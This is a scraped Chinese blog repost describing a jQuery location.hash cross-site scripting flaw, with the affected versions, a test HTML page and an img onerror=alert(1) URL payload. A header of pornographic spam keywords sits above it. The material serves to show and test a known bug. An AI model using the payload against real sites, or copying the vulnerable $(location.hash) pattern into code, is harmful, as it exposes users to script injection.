日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

JQuery跨站脚本漏洞

發布時間:2024/6/3 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 JQuery跨站脚本漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

原理:

????jQuery中過濾用戶輸入數據所使用的正則表達式存在缺陷,可能導致 location.hash 跨站漏洞

影響版本:

  • ? ? jquery-1.7.1~1.8.3
  • ????jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js
  • ????jquery-1.5所有版本
  • ????jquery-1.4所有版本
  • ????jquery-1.3所有版本
  • ????jquery-1.2所有版本

測試代碼:

  • <html>
  • <head>
  • <title>JQuery-xss-test</title>
  • <script src="https://code.jquery.com/jquery-1.0.1.js" ></script>
  • <script>
  • $(function(){
  • try { $(location.hash) }
  • catch(e) {}
  • })
  • </script>
  • </head>
  • <body>
  • Jquery xss test.
  • </body>
  • </html>
  • 然后訪問如下:http://localhost/#<img src=/ οnerrοr=alert(1)>

    在線測試平臺:JQuery跨站腳本在線測試

    總結

    以上是生活随笔為你收集整理的JQuery跨站脚本漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。